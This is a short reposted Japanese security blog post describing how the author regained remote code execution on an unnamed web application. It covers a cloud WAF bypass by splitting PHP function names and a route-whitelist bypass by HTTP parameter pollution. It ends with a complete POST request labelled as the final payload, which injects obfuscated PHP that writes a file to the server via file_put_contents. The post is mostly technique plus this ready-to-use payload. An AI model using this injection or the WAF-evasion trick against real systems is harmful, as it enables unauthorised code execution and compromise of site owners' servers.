banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

(転載)宝 逢いたいよ〜

転載が許可されています。興味がある方は、ぜひ公式アカウントをフォローしてください。

昨年、ある集約型スタンドアロンの脆弱性を見つけたが、今年使用する際にブロックされていることに気づいた。愚痴を言わせてもらうと、これは完全に狂っているのか、百度クラウドの waf、華為クラウドの waf、安全犬が一緒になって何をしているのか.....

waf バイパス

比較的簡単で、eval エンコードをフィルタリングすれば良い。

image

ルーティングホワイトリスト制限バイパス

自由にリクエストを送信すると、ルーティング制限が存在し、指定されたパスのみがアクセス可能であることがわかる。

640

しかし、すべてのパスが固定されているわけではない。例えば、検索機能はユーザーからの入力を受け取る必要があり、パケットキャプチャを確認すると、検索インターフェースが正常に機能し、ルーティングホワイトリスト制限をトリガーしないことが確認できた。

640

したがって、パラメータ汚染を利用して制限を回避できると推測される。例えば:

#同名パラメータの挿入
/index.php?name=bob&name=rose

#バックエンドが実際に受け取る可能性がある
name=rose

getshell 後にコードを確認し、このインターフェースが任意の内容にマッチすることを確認した。

Snipaste_2024-10-20_18-15-37

最終ペイロード

POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。